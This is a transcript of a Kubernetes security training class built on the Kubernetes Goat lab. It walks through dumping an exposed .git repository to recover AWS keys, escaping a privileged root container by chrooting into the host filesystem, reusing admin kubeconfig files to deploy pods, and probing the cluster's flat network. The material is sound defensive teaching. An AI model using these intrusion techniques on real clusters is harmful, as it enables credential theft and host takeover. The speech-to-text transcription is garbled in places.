Kubernetes Security (AU)


language: EN

                  WEBVTT
All in the same training now.
Yeah, I see that you're okay.
That seems, yeah.
And here's.
Okay, so let's see what we were discussing about.
So if you do a cat.cube config,
you will see.
You will see.
You will see this file and it has,
this is our key, this is the certificate,
this is the user, well, the equivalent to user.
So it has a lot of information.
Actually, here are all the clusters that we have installed.
And the tool that we use, the QCTX,
what it does is to change context.
I mean, which are the, in this file,
what you will find is each one of the context
or each one of the clusters.
And you can see that is a general file.
It has an APA version.
And with QCTL config view,
you can see kind of the same,
but in a more organized view.
Okay.
So let's go to our labs.
So is there any question about what we have seen so far?
Okay.
Okay, so let's see the following.
So it turns out that for securing a Kubernetes cluster,
there are like, not different approach,
but different best practices.
And the first one is related to images, to image handling.
I mean, in this situation, what you need to do is
to be sure to use space image that are trusted,
to scan for vulnerabilities, your images,
to avoid, to use a lot of software in your images.
So it's part of that step.
What we're going to do in this lab, in these labs,
there are some labs here, is to see what happened
or what kind of stuff we can find
when you don't do a proper job securing your image
or a proper configuration of your image.
So this first lab, it shows us what happened
when you left by accident or on purpose,
for example, the key or the key, the password
for your database or the key for Amazon or whatever,
which is something super common, super, super common.
So this is the idea of this first lab.
Okay, let's do that.
So let's be at this directory.
I'm going to split this in two.
So we have this folder called labs.
And let's go there, labs.
And please go to the Goat folder.
So we are going to move now to the Goat cluster.
So I need you to execute kubectl kind Goat.
But what this command does is to show us,
to move us to the different cluster,
to the Goat cluster, which is our,
this is a cluster in which we have several scenarios
for hacking purposes.
This cluster have, it's super beautiful.
So we can play a lot there if you want.
So before execute anything,
we are going to check where are we with kubectl.
Get all, dash dash all namespaces.
Which at the end you start learning
or memorizing all of these comments
because it's kind of similar.
Yeah.
What does Goat stand for?
Goat.
Yeah, it's called because it's a project
for from this guy that he created this environment.
But I don't sure I'm looking here.
Actually, this is the goat.
So I'm not really sure if it stands
for anything in particular, but probably.
Okay, so if you run this, get all namespaces,
you will see a lot of stuff.
I'm going to maximize this terminal just for a while.
So these are different pods that are run here.
Please check that all of your pods are running,
that there is no a crash look back or something like that
because that will affect the lab.
These are different scenarios to work with.
We're going to try to work with the most of them,
but probably we are not going to be able to.
There is the services, the services published here.
The daemon said, the deployments.
So just for the sake of curiosity,
if you want to check one of those deployments,
get deployments slash, let's see, for example, this one.
You can take a look at whatever you want.
So I use the health check deployment.
Yeah.
So it shows.
So what is this unknown state?
I don't know what that means.
Oh, this unknown, I haven't seen that state.
This is not the first time.
Let's stop.
Is that a path?
Oh yeah, it's a path.
Yeah.
Let's take a look.
Oh yeah.
Actually, there are three hidden layers.
Two are unknown state and one is running.
Is this the same for you or not?
No, you have only two.
One unknown state.
Okay.
Unless everything is good.
Okay, let's see.
I think this is one scenario in which the image
in one of the layers has information or vulnerability.
So let's see when we reach that to see what it is.
Okay, so checking the demo now,
you can see this is like a standard, it's very basic.
The container, it exposes a port, it's super simple.
And that's it.
So this is scenario, the one that we are going to work.
It shows like a popular mistake, a super common mistake,
which the developers and DevOps execute or fail into
when they package their artifacts or their applications.
So the idea is to test different misconfiguration,
identify an entry point within the web application,
and then see tools to help us to identify
this kind of errors to be able to solve it.
So what we are going to do is to run this script.
Ah, before that, let me show you something.
Just for navigation purposes, with Docker PS,
you can see the docker that we are running.
All these clusters are running on top of Docker,
the cluster that we have.
And this one in particular is the Goat,
which only has one container, one Docker,
but the other have like one worker and one country plane.
And this is script access Kubernetes Goat.
What it does is to export
to one of the ports of this system,
to the ports 1230 to 1236,
the different scenarios that we're going to work.
So let's run this script with that slash access Kubernetes.
So now I've done really get what does this script do?
What this script does is execute a command
which is called port forward.
And with port forward, what we do is to,
so actually, you know what?
No, don't execute the script.
Let's do it now also.
It gives us like a better sense of what we want to do.
So just execute a cat access Kubernetes.
And we are going to expose the first scenario
which is sensitive keys.
In order to do that, we need to identify the pod
that is running that scenario, which is here.
So you can copy these lines and execute it.
So if you take a look, this command,
what this command does is to get pods,
but it has more like more information.
So let me show you a simpler way to do that.
Because if you take a look at the command,
it's kind of complex.
Get pods, dash dash namespace default.
Okay, that is simple.
It says where is the default,
but this is slash dash all it's labeled.
So what is done is to look for pods,
labeled with app build codes.
And the outputs, give the output in JSON,
but what I want from the JSON is this key,
this specific key.
Got it, okay.
Yeah, but I mean, the lazy way to do the same is like,
well, actually we don't need to define the default namespace
because it's the default namespace.
We can do a QCTL get pods, grab.
Ah, actually, the dash all white shows,
I think it shows us the,
this QCTL get pods, grab codes.
So it will show us which one has code in it.
But the thing is that, I mean,
this is easy because there are not too much pods,
but when you are having hundreds of pods,
usually you would want to be sure.
So that is why it is important the labels
and this JSON paths,
because this can be exported not only in Jaml,
but JSON, with JSON you can filter that way.
So what this is giving us is the name of the pod,
the specific pod that is running this, this lab.
So we are going to copy that, that name.
And then we are going to expose that pod
and the specific port of that pod in our server.
So that will be dash, dash address,
view, view, view, view.
So it's like this command,
but the pod name you need to change it, right?
Yeah.
So if it runs,
it gives the terminal lock.
And it's okay, let's leave it like that,
just to test it right now.
And to understand what we are doing.
And then go to localhost.
She's the service that we exposed.
When do I open the browser?
It's over on top, at the top.
And localhost, localhost colon 1230.
So the port is going to be?
1230.
So the objective in this scenario is to identify
the sensitive keys that are exposed,
that are available in the code base of this deployment.
This may include the application code,
the container, the infrastructure.
So here we are using our hacker hat.
The idea is to, okay, how can we do that?
So if you were a hacker and you are facing this website
and you want to explore if this website,
in this service, in this application,
there is something valuable for you.
I mean, like in this case, some keys, some secrets.
What will you do?
What do you think that will be the first approach
to execute?
And take into mind, into consideration
that we are outside, we are, okay, I'm here.
This is what I'm seeing.
What should I do?
What do I do?
I would go and right-click and inspect.
Right at what?
Sorry.
I would go look at the page source.
For example, that's a great idea, yeah.
To see what's in there.
So there are, for example, there are different tools
that we may use.
GrowBuster, it's one tool.
DeerBuster is another tool.
But there is a simpler one,
which is like, actually it's unbelievable,
but it's super common.
And it's that if you, if you,
I mean, you're familiar with a Git rep constructor, right?
Yes, yes, yes.
So where is the information in a Git rep constructor?
I mean, the, like the basic configuration of the rep.
Exactly.
So it's unbelievable, but there is hundreds,
if not thousands of websites
which have the .git.conf expose.
So in this case, this is one.
So if you take a look.
So there are tools that allow us to do this via brute force,
but we are not going to do it right now,
because I mean, let's go straight to the point,
but that's the idea.
So it turns out that, okay, you may think, okay,
but there is not much information here.
So what can I do with this information?
So it's, this is, I mean, this is amazing.
I will say that let's, you have your two terminals, right?
Yeah.
Let's move to our workspace, k8.6,
so the other directory.
Move to this directory, k8.6.
So there is this tool called Git Bumper.
Execute it here, and let me show you Git Bumper.
Ah, well, before that, let me show you one of the,
Robuster.
Robuster, this is a tool for brute force
that allows you to explore your eyes.
It's in Go, so you can download it here and install it.
Perhaps we can do later if we have time,
but this will allow us to find stuff like that.
And this one that we're going to use, Git Bumper,
is a tool that if you have a .git config around
or a .git directory, you can use that to rebuild that.
Go.
So it's super, super cool.
So what we're going to do execute here is Git Bumper,
and we know that you are all, let me,
let me copy, yeah.
That's the bad git.
And we are going to create the folder for this repo.
I'm going to call it like this, it's k8s.git.
Let me copy this for you.
And let's run it.
And this is like, wow.
So, I mean, the first thing that you will need to do is,
okay, let's explore, because I mean,
it's super common to have your website in a Git repo.
That's something, or a service, or something particular.
So what you want to do is, okay,
let's scan all my websites which are running
this kind of platform, or actually in any platform,
and see if that git config file is available.
So this is a typical scan in the internet.
And if that's the case, like this one,
you will have a repo created here.
This is all your code base.
If you do an LS, okay, I can see some stuff.
Let's understand this repo.
So the first thing that you probably will do
is git log to see, okay, what is in there.
And here is, you need to, I mean,
we are in the, like trying to grab the most information
that we can in order to access
or to exploit this information.
Because, I mean, we have a copy of the website,
but that doesn't have any much value.
We are looking for customer data, or keys,
or passwords, stuff like that.
So in git log, probably we may see stuff interesting.
There is actually, I'm going to show you.
There is a commit with environmental variables.
So I'm seeing the git log.
I can see the git status.
It looks like something.
I can do a find to see stuff like here.
I can see something which is typical
in this kind of application is that environment.
In this case, it doesn't show anything.
However, going back to the git log,
and if you can take a look to the git log,
there is this commit which has the,
the message talking about environmental variables.
So take a look.
Take a look and let's, as we have all the repo,
we can check out that part of the repo
and see if it has sense.
So we'll check out.
So if we execute that, we will have the information here.
And in this case, there is that environment.
Execute a ls.o8.sac.
And in this case, you will have that environment.
There is a tool that allows us to execute this as well.
I mean, in this approach, we are outside, right?
We are outside from the system and it was manually.
But we can be inside the cluster.
It's you doing the same for your systems.
You may want to do the same from the inside as well.
So first analyze this.
This environment variable has all the Amazon access keys.
So it's a big deal because you can deploy
a micro cryptocurrency miner
to this Amazon customer as well.
So let's see the other side of this.
I mean, being the administrator of the QNAPs cluster.
So in this case, let's explore the thoughts that I have.
We are talking about this application,
the real-curric deployment.
So we can have a shell inside that pot.
So in order to access that pot, there is this command,
exec, which is the same line as in Docker.
Dash IP, dash dash, slash.
So let me copy that for you.
Now it's faster my system, so I can't.
So if I execute that, it will take me to inside the pot.
So I'm inside the pot.
I can run some commands here, ps.
Let's take a moment here to explore what is a container.
So the first thing that you will notice is
if I execute ps or ps exu,
it will show me like two, three processes running.
If I go to a different terminal,
let me send this to the ground.
If I go here and execute the same,
I mean, you're talking 520 processes.
So that's the first difference that you will notice.
Now the second difference here is,
let me show you this.
Let me show you this.
The first thing that you'll notice here
is that the process number one,
the PID number one in a Linux system
usually is the init because it's the one
that executes the services within the system.
But in this case, in this case is the application process.
So yeah, so when you are inside a container,
you don't have too much tools,
depends of the container or the cost.
For example, this one has a lot of tools.
I mean, a ping, you are not supposed to have a ping
inside a container.
That's a bad practice.
You need to have the less developed.
Let's see what else notice that.
Okay, this has a lot of stuff,
this container, this image.
If I take a look at user read,
there is some ton of stuff.
So there is another lab in which we are going to exploit this
to access the host.
So, okay, in the meantime,
what I want to tell you is this, which is super important.
As we are so limited in comments in a typical container,
I want to know the most possible about an application.
So we are going to use like
the Linux knowledge that we have.
And it turns out that there is this system directory
called proc from processes
that has the common line for everything that is running
for each one of the processes.
So I can see what was executed to run this application.
But the few common line, in this case, is super simple.
So it doesn't show too much of the same.
Okay, this is, okay.
So I was telling you that there is this utility,
which is called truffle.
It's installed here for the,
just for demo purposes.
But this tool, and let me show you the report.
It's a tool that allows you to scan credentials
in every place.
I mean, you can look for credentials in GitHub,
in an image, in a directory, in a website.
So if we use it here,
hopefully you will be able to show us something.
So it does do a crawling down there.
So the solution for this kind, I mean, this decision,
okay, it detected the credential.
So the solution for this, I mean,
as a part of your pipeline,
in DevOps, the CI CD pipeline,
the idea is that you execute this kind of utilities
to scan for your images,
because, I mean, this is just an accident.
The developer forgot to include that in gitignore file.
So that may cost a lot at the end.
So this kind of stuff is what is supposed to be avoided.
So can this kind of scan be a part of our cluster definition
itself that when...
Actually, that's a great question,
because yes, there is some policies.
I mean, there has been a lot of changes here.
There was something called pod security policies
in which you can define some policies
to handle this stuff like that.
But that was actually in the version from the last one,
was depreciated.
And now we're discussing about policy,
policies security admission process.
Yeah, policies security admission.
And in this case, it's like, let's call it a filter.
And this filter, when you send something
or try to deploy something,
it will check that it fulfills the policies
that you have defined it to be fulfilled.
So it doesn't check at this level,
but it checks if, for example,
the image was scanned or not.
So if the image wasn't scanned,
it won't allow you to deploy it.
So in this particular case,
what you need to do is in your pipeline,
when you are creating the image
that is going to be deployed inside QNets,
to do this scan, to check this stuff.
Yeah?
Yeah, yeah.
Okay, okay.
So let's do that as well.
Okay, so now are we going to...
It's okay, right?
Or is there any question?
So let me, let's bring that process from the background.
Background, and let's stop it.
And now that we have clear what we are doing
with this script, we are going to run it completely
because that will be easier to navigate.
So just stop it.
You bring the process from the background with FG,
you can bring, okay, and control C, perfect.
And now we are going to run this script.
Okay, perfect.
So go to this URL,
and this is the QNets code.
I mean, so there are a lot of labs here.
We are going to do some of those.
But I mean, as you can clone the rebel,
you can do it then by yourself and explore more.
So we just did this, the sensitive keys,
which is kind of beautiful.
Let's do the next one.
Let me check if this is the next one.
Let's do this one, this one.
The container escape to the host system.
So this is the 1233.
So let's go to local host.
It's slow, it is slow again.
Perfect.
So this is one of the,
I mean, the most dangerous attacks
because a misconfiguration,
a common misconfiguration in QNets
or in a container environment
may give access to an attacker to your host system.
I mean, the host system will be the actual server
which is running the Kubernetes nodes.
So if you have that access,
I mean, you can do a lot of bad stuff inside your company.
So this is like a big case.
And well, this applies a lot of stuff.
So the idea here with this scenario
is that we're going to exploit a container
and escape out of it.
I mean, to go up to our host system.
And this will show us why it's important
to run all the containers with non-root users,
which is actually, I would say is the most common setup
to run containers with privilege as a root user.
It's super common and this is super bad.
Okay, so in this scenario,
we are directly in the container.
We have access to the container.
And this, you can imagine that,
I mean, if your application,
the application, the web application or the service
has a vulnerability that was exploited
and was able to provide a shell to an attacker,
which is actually fairly common.
And this will be like the second level
what we are seeing here.
I mean, here we are assuming
that there was a vulnerability in your application
that allowed to an attacker to get a shell
from that container.
So if that container is running as root
as this is the case,
you can try to access the container
of the host system.
So there is a technology in Linux,
which are the capabilities.
Are you familiar with cellings?
Have you ever used that or hear about it?
I mean, we have our sys admins
and they do implement a serenades.
So I know that it is very restrictive.
Yes.
Sometimes it makes our lives really difficult,
but I think that's important as well.
Absolutely, absolutely.
Because usually there was this time
that everyone preferred to disable
or not enforce cellings,
but that's like losing a lot of power and control.
So the Linux system has something called the capabilities.
And these capabilities are, for example,
the permission at a kernel level
to execute a ping,
to become a super user,
to write on the file system.
So it's really important.
So what we are going to do is use a tool called capsh.
And I'm going to show you here capsh.
It comes in several district.
So it's a shell that allows you to access
or to interact with the capabilities of the Linux kernel.
So it shows you what capabilities are available.
So with capsh-print,
you will see all the capabilities
that has this container.
So the idea here is that,
I mean, this container has two things here.
One is that it's running as a root user.
And two, it has basically all the capabilities available.
If you take a look, for example,
the capability of execute change owner.
So you can change a file to a different owner.
The capability of change root, system change root.
So we're going to use that one.
The capability of kill a process, for example.
So they will be able to kill my application.
And if you read everything here,
these are all the capabilities to install software,
to change the network.
I mean, it's super, I mean, it's the power of Linux at the end.
So one of these capabilities,
let me see, let me see, where is it?
The idea here is that, okay,
let's see which of these capabilities I can use
to gain further access to this victim
that I'm attacking.
So if I execute amount comment,
and that is because I have the CH,
the change root capability available.
You know, in Linux, there is this concept about root,
changing root.
So I can read the root on a system,
but if from this system, I can access another file system
and access locally,
I can move from my current system to that other system.
Yeah.
So this is what is used when you rescue
a Linux server that has failed.
So you start your server with a USB drive or with a CD,
and the USB drive starts a Linux system,
but in the hard drive or your server,
there is another Linux server, another Linux system.
So from the USB, you access the file system
in the hard drive, and you change root,
move from the USB to the hard drive,
and work in the hard drive and do stuff.
So what we're doing here is the same.
I mean, the container has a root,
and the container has access to the file system.
For example, if the container is a web application,
and the web application, the files of the web application
are located in the local file system of my dose,
and are shared to the container.
So I can change root to that, and from there, do stuff,
or see what I can do, depending on where I am.
So that's what is happening here.
So one, okay, here.
If one take a look here,
you will find the slash host system.
Oh, wait, it's low again.
So this host system is the,
well, my host system, I would say,
is where the container is running.
So if I take a look, oh, that's slash,
okay, it's there, host system.
If I host,
but wrong host system,
to see what is there.
Okay, it's not.
But if I host, but I'll ask, slash, that system.
So this is huge because,
like this, I can see what is inside that file system.
So I'm in the Docker, I'm in the container, sorry,
and the container has a folder
that reflects the file system underneath.
So what I'm going to do is jump from here to here.
This is what we're going to do.
So this is, change root is the command,
and host, dash, system.
And after that, I'm going to tell
which command I want to run.
And the command that I want to run is dash,
we see which is the standard shot.
Actually, before executing that,
we can explore a little bit that file system.
Let's see, okay, let's see if find exists,
host, file, system.
Yeah, it exists.
So it shouldn't be there.
That's, I mean, the less your image has, the better.
I mean, it doesn't have, it should have nothing.
Nothing beyond what your application needs to have.
That's super important.
So if I execute the file, I mean,
I can explore and understand everything.
And actually, what we are seeing here is this system.
Yeah.
Is this system.
So let me stop here and...
Okay, I can see all the commands that are here.
So anyway, I'm going to change root now.
Host, dash, system, bash.
Okay, I mean, it doesn't seem like nothing.
There is like nothing happened there.
But if I execute an ls, I will see,
okay, something is different here.
Yeah, actually, I even can ls home,
for example, to see what is inside.
Okay, it didn't show anything.
ls root, let me see.
ls bar.
ls etc.
Okay, so it's all that information.
So let's think again.
I mean, we had access to a shell,
which is running in a container.
And we are exploring what we can do from that container.
As of right now, we were able to jump to the host system.
So what I can try here is that,
as I know this is Kubernetes,
and usually Kubernetes uses Docker,
I can see, okay, let's try Docker, Docker PS.
So it didn't show anything.
I perhaps will have to use the full group.
So let's use our,
actually, let me see.
Okay, with, I mean, as I change root,
I usually don't have the path set up
and the environment variable set up.
So if I execute su-,
it makes me root with the proper environment variables.
So that way I will have better access
and don't need to know the path to all the files.
So let's try again, Docker PS.
Oh, it's not there.
But I can see here, I mean,
with PS, I can see a lot of stuff here.
So probably is that I don't have
the proper root or something.
Let me,
okay, Docker environment.
Let's see that file.
It didn't show anything.
Let's try,
okay, it's not there, but let's try this.
Let's see if it's in another folder.
Oh, it's not there.
I just realized something.
Okay, for example, I just find the cube add conf
and perhaps I will have the that cube conf it's here.
Let's see if we have it.
Yes.
Ah, but there is no conf there.
Let's see if cubectl is there.
Okay, I do have cubectl,
but it's not necessarily connected.
By default, cubectl
has the, in barely has its configuration.
So we can take that.
Okay, so let's see.
I mean, this must have, actually I'm wrong.
We are not in this system.
We are not in this system, but in the Docker,
in the Docker server that is running.
Yeah, that is why we don't have Docker
because we are here in this Docker.
So there is no Docker inside this Docker,
but we do have other information.
So,
so let's go var new.
Okay, so here is cubelet.
So if we execute psaxgrub cubelet,
we can see all the information in the cubelet
and we can see, for example, the cubeconfig files.
So what we are going to try here is,
let's see if we can find and save cubelet.
There is config.
Okay, and this is the cubelet file.
So we cubectl dash dash qreconfig.
Confid is, yeah, config.
Then all dash dash all the other spaces.
Let's see if it works.
No, let's see, that is not that fine.
It's the same error, I think you're saying.
It's running.
I'm going to run it, let's try this.
It should be,
no words here, because what we can do here,
once we are able to find the cubiconfig,
is that we can deploy another application here.
We can deploy in this node another application,
which is kind of huge.
I mean, this is the AP server.
Let's try this one.
So qctl.
Cubiconfig, cubicon.
Let's see if it works.
So it worked.
Okay, so it worked with this one.
So what we're going to do is just try to deploy
Hello World application.
Just to prove the point.
The bad thing with this stuff is that you lose track of time.
So the idea is that we went for lunch at 12.30, yours,
but I guess that we can go at 1 p.m. for you.
It's okay.
So qb.com.
I just sent you the comment.
So let's try to deploy something.
Let's see if it allows us to do that.
Before that, let's see the notes.
Okay, we are able to see the custom.
Let's try to deploy an application.
Give me just a second because I'm looking for the young file.
Let's see if it works.
Need one, I found this one.
Okay, so.
Oh, there's enough.
You need to copy by hand.
That's a normal.
Yeah.
Actually.
Well, yes, because I have to wait a second.
No, but I can't copy given this is a time.
Let me check that I have it, if I have it right.
Well, it's okay.
Okay.
Let's see if it is able to deploy.
Oh yeah.
Well, that's the best way to learn.
Let your fingers to learn.
I have something that I call password fingers.
I mean, I don't remember the passwords,
but my fingers do so much.
I let them write and time.
So what exactly, this is just a simple hello world.
Application.
Just a basic deployment.
Yeah, that is right.
Actually, you can open the file.
Okay.
Take a look.
Oh yeah.
Oh, it didn't, I mean, it failed probably,
ran or something.
But I think that, yeah.
Let me to create something,
actually something simple.
Should I type the entire thing
or are we looking for another?
No, try it to run it, because it went in my case.
I'm not sure perhaps in your seat it's able to deploy.
Okay.
I'm going to try to deploy it in English.
I think it's in English.
So here it's able to run.
Okay.
I mean, in this case it failed as well,
but I think that we have the idea.
Obviously, I mean, there are plenty of options
to try this.
Let me think about an image,
because it is smaller than English.
In this case, it was require something.
Okay.
I mean, in this case,
you will have to make some changes
to the configuration to the control plane.
But I mean, you have authentication against the API server,
the kubectl works for you.
I mean, it's like obviously limited,
but strong enough to install a crypto miner for sure,
I guess.
Okay.
So I don't know if there's any questions regarding this.
A lot or not?
No, no, no.
I mean, yeah.
I mean, if it had run,
probably I would have a better understanding
of how exactly this is going to impact.
But what I understood is that for this to work,
you at least have to be inside of the Kubernetes cluster.
Not really.
In this case, you are inside the container.
The container.
So let's see that you have an application,
a Node.js application or Angular or whatever.
And that application has been compromised,
has an exploit.
This exploit allows you to get a shell in the container.
Yeah.
So I mean, that depends on your application percent.
So you were able,
the attacker was able to gain access
to your container via shell.
So that's an issue.
An application problem in the code,
it wasn't properly secured, whatever.
So in this case,
the attacker exploit a Kubernetes
or a container misconfiguration
in the sense that the container was running as root,
has all the capabilities of Linux enabled.
So he was able to, from the container,
jump to the host systems.
And once inside the host system,
which is the worker node or a control plane node,
he has access to everything that this node has,
which is the ability to run more containers,
to connect to other containers,
to destroy the node, remove everything, for example.
So that's where it's big.
And we are doing this because in the next,
in the next labs, we are going to eliminate the capabilities
to avoid the use of root.
So no matter if your application has an exploit
and is able to give a shell,
the person won't be able to do anything
because it's secure your container or your cluster.
Yeah, so I think you already answered my next question.
So basically, I mean, even if you have the vulnerability
to gain the shell access,
as long as that itself is secured,
hackers cannot do, I mean, of course,
you need to secure your one as well.
You need to make sure there are no vulnerabilities
but at the same time, multiple levels of.
And that's the biggest issue with Kubernetes
because I mean, there is the application layer.
So the application per se, that's a whole another story
about how to secure that application.
You have the platform or the container
where your application is running.
So this container, which is the one
that we are talking about,
behind that you have the Kubernetes cluster.
Behind that or beneath that,
you have your virtualization environment
or your platform, or your servers.
So it's like four layers that you need to cover.
And actually, that's the disadvantage that we have
because the attacker, he only needs one entry point
to do whatever he wants.
In our case, we need to see everything.
We need to check the application, the container,
the cluster, the server, the virtualization.
It's super hard.
It's a lot of stuff to analyze
because in the first lab,
he was able to find just an entry point.
And from that entry point, he gathered more information.
In this case, the same.
He was able to cross one of your defenses.
Look at this in that way.
There are multiple lines of defense
and he reached the first one.
If you have a second strong line of defense,
okay, he did that, but he wasn't able to do anything else.
But in this case, he was able to go inside
and go deeper and deeper.
And we can stay here the rest of the day doing the stuff
and we will be able to do it.
So that's it.
That's it.
Okay, so let's see us in one hour
and have a good lunch.
Sorry.
And let's keep going.
Okay.
All right.
Okay.
Thank you.
See you then.
Bye.
Hi.
Hi.
Okay.
So let's move on.
Do you have this side come on?
I was able to deploy the application.
I'm going to show you.
Okay.
So what went wrong there?
It was, I mean, there was more QA config files
in the same directory and one of them worked.
So give me just a second.
Okay.
Show you.
Okay.
So.
So now we're going to,
let me show you first.
So, okay.
So I was able to deploy this, this sentence.
It turns out that in, I mean, the error that we saw,
it's because the, actually for security reasons,
the QBlet QB config file, to name it somehow,
has this restriction.
It only allows to create mirror pods to our data.
What we are trying to do.
Just exactly that.
However, in the same directory,
when it is secure nets,
there are more files and QB configs.
And I use this admin.
And with that admin, I was able to deploy,
to deploy another,
another pod.
So, tell me.
Go on.
Listen.
So with this admin QB config,
we can try the deployment.yaml that we were trying.
Well, actually, yeah.
Okay.
Oh no, I have to dive a lot.
Yeah.
It's super hard.
Let me look at the history.
This one, the hello world.
That's true.
Yes.
Yeah.
So we need just to change the master.
Oh, oh, master.
Yeah.
Oh, what happened?
This admin, that's what I remember.
Ah, yeah.
Sorry, it's admin.
I got confused.
I think that is taking some time.
Yeah, it's kind of like,
actually, I think I was able to copy.
Yeah.
Let me short that because I was able to copy the text.
Okay.
Interesting.
It's there.
How did you copy?
Controls?
Yeah.
Okay.
So in theory, control V should work as well.
It's here.
So we have run two scenarios so far.
The first one was like
a misconfiguration in the proper image.
So it needs to be addressed by,
when you create the image, scan the image
to see if stuff like that happens.
The second, which is this one,
we are addressing here two things,
which are the security context.
One is being able to execute as a,
or the container being executed as root.
And second,
the capabilities available.
The container has access to everything.
And next we're going to do one related to network policies
to be able to access from one application
to another in the same cluster.
And then the users permissions.
And see how it works.
And then we start to create policies to block that stuff.
Okay.
It's taking a lot.
We can leave it there and see later.
So let me show.
So what we're going to do now is this scenario,
which is called Kubernetes Namespace Bypass.
So it turns out that
by default, Kubernetes has a flat network.
Almost everyone assumes that if my application
is in X namespace,
there is no access to a different application
in a different namespace.
I mean, if I have namespace X and namespace J,
they can communicate in the standard Kubernetes
with the flat network.
That implies that, for example,
if I have an application which has a cache store
or a local database or some data or something,
I can access from a different application to that.
So if in your cluster, you have 100, 200 of applications
and one of them has a vulnerability
that allows a hacker to somehow exploit or access or wherever,
that means that this hacker will have access to everything,
to all that you have in your cluster.
So that is pretty good.
So actually a lot of the exploits or the hacks
that have happened has been because of this,
because an application had a vulnerability,
it was exploited and then they access
to a different application within the same cluster.
Okay, so we are going to see,
well, that flat schema of the working
and see what we can scan in the network
and see if we can find another stuff
or another systems as well.
So in order to do this, what we are going to do is,
let me go here.
Okay, it's failed.
Well, this is a silly error to be honest.
It's here.
It says that it failed because it wasn't able
to find resource mapping.
And there is no matches for kind,
the type of object or resource deployment
in extensions V1, V1.
This happened because probably this manifest,
this deployment is too old.
The API version says extensions.
And right now, the deployment is already in app version one,
I guess.
So it's just a matter of correct this deployment
and correct the API version.
So this is a good thing.
Okay.
Okay, so let's see our pods.
Let's go again to our system to get pods.
So there are different pods.
What we are going to do is we're going to launch a pod
called Hacker Container.
This pod has, well, it's for this lab.
It has a lot of networking utilities
that allow us to see, to explore the network
within the cluster.
As it is.
So for doing that,
sorry.
And we are going to run it.
Hacker Container.
Let's go.
Let's launch Hacker Container.
So we can copy this for you.
Okay.
Let's see the pods here.
Actually, we can see the pods that we created
to the other side here.
I'm going to remove those.
Okay, you should have by now the shell.
If you don't see it coming from, just press enter.
It should show you something like this.
Let's do it.
And
just a second please.
Sure.
Okay.
So,
okay.
You can remove that.
Oh, no, perhaps you didn't create it.
I didn't create it.
Okay, no worries.
So we are using this container.
It's a shell, we don't have the dashboard here.
Let me check.
Let me try to install the dashboard in this cluster
because it would be useful to see easier.
So let's see if it works.
Let's try to learn it.
Let's try if it installs.
Okay.
Okay, I think that we, let's see if we were able to.
Okay.
Let me copy the comments here for you.
It went backwards.
The one that I sent is the last one.
Yeah.
I need to be in this folder, in this directory that I am.
Okay.
When you execute this last one,
this is something called a token,
which I'm going to explain that later.
But actually what we just,
what we are doing here is first create a deployment
with the dashboard.
It has like two or three pods and a service
and some stuff for the dashboard to work.
And we are creating a user, a user that,
that we roll base access.
And we are assigning a role for that user,
linking the user that we created
with the dashboard in space.
So he can handle that.
And then we are creating a token for that user
to access the dashboard.
Okay.
So these.
Like how you do it in database,
like you create a schema and then you create a role
and then grant privileges.
Perfect analogy.
Exactly, exactly.
So this will show you a token.
You need to copy that because we will need it
and execute the command to proxy.
Okay.
Ah, but before the, before cubitctl proxy, sorry.
Before that, let's see if our.
The dashboard.
The dashboard was created.
I don't see it.
Ah yeah, I did see it.
Cubernet dash dash board.
Oh yeah, and it's running.
So it's not failing on us.
So cubitctl proxy.
This will open a port to,
in order for us to access the dashboard.
Oh God.
Yeah, because that way we can.
So what kind of role is granted?
I mean, you can check the YAML file.
Yeah, sure, sure, sure.
You can just open the, the,
the visual code in that directory
and you can take a look.
But we are going to do that step by step.
So, but it's, take a look.
Yeah, so it says the user, the object,
because actually in Cubernet,
there is not such thing as an user,
but it's like the equivalent.
So the cluster role, which is cluster admin,
and it has control over the whole cluster.
And the service account, which is the admin user.
Service account is, it can be a user or an application.
Yeah.
So that's where you are linking that
with the API of authorization.
Got it, yeah, okay.
Okay, so here, let's go to the,
to the browser.
And it should be in the,
in the, you need to run first kubectl proxy, right?
No.
No, I'm sorry.
So.
No.
Oh.
Oh, this is a bit,
I'm not sure what are you doing.
Open up the dashboard.
This is the, on the API actually.
This is the URL that you need to open.
Yeah.
I just,
copy that.
I already opened one.
Okay.
Here.
I send you the full URL to the chat.
Okay, okay.
I need to do a talking.
Okay, thanks.
So how do you remember such a big URL?
No, no, no, no, I went to the,
to the GitHub repo.
And it's the, but because actually it should be shown
or print by the kube proxy common,
but it didn't do it.
I'm not sure where.
Because it's like, wow.
But if you take a look,
it's not that hard to decipher.
I mean, because it's the API, the version on any space,
the kubectl dashboard in space, the service.
Yeah, but you have to remember the sequence of how.
Yeah, absolutely.
Yeah.
Okay.
Okay.
So, finally, let me introduce you the dashboard.
The Churnets dashboard.
So just a quick review as we weren't able to do before.
So here in the top bottom, in the top left,
you will find like a menu.
It shows you all the names, faces available.
It's set in default.
But if you choose all names, faces,
you will be able to see everything here.
The daemon set, deployments, the jobs, the pops,
the replica sets.
There are three pops failing or that fail previously.
And actually we do have the 21 pops running,
which is, it's the quell into quell 21 servers, right?
So the daemon, the deployment, deployments,
all of the stuff that is here, the jobs.
And if you remember the API, it's here.
It's the same structure.
Wow.
It's there.
Okay.
Yeah.
If you want to take a look on the pops.
So if I want to take a look of the pops
for a specific namespace, I can filter later.
And in these three buttons, you will see, for example, lots.
So it will show you the lots for this part.
Okay.
And going back, you can, for example,
which will give you the terminal,
the exact the same cube CTO exec dash TI
plus dash dash dash is the same here.
So I'm not sure if this pop has another show,
so let's wait a little bit.
Because actually, if you think about it,
you will realize that there is no real reason
for a container to have a shell.
I mean, you want to run an application,
a Python application, a Node.js application,
a Java application, whatever.
But is a shell needed to run the app?
In a lot of cases, there is no need for that.
So just doing that, you will reduce the surface attack
vector a lot.
So I'm not sure.
So how do you avoid that?
Come again?
How do you avoid that, getting the shell on?
When you prepare the image, I mean,
you can use an image that doesn't have show.
There are a lot of actually, let me show you.
The image available are the ones for alpine.
Alpinings.
So they have a lot of different images that you can use.
These are, these ones, the mini root five systems.
Or you can build one in your case.
It's not showing anything.
I mean, there is one or not, a shell or not.
Let's try the other one.
It showed error as well.
So perhaps it's...
So what we can do is just go to the container
that we want.
Okay, the hacker container.
Yeah.
Yeah, that one.
Let's see, that one.
Okay, it's here.
The frame.
Okay, so here.
Okay, so it showed up instantly.
So it has a shell.
Well, actually I made sure because it seems different.
Oh yeah, the one that we run here was pure shell.
The one that is here is bash.
Anyway, so.
If you run ls, you will find it's too small.
I need to move here.
It's too small.
So.
So here you will find some utilities are available.
Actually we can use this container for other,
during the training.
Well, this is kill control.
